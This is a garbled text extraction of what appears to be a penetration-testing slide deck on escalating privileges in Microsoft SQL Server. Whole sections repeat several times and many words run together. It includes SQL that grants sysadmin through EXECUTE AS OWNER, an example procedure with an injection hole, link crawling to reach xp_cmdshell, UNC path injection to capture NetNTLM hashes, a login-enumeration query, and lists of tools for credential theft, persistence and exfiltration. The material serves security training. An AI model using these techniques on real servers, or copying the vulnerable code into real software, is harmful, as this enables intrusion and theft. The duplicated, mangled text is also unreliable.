OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
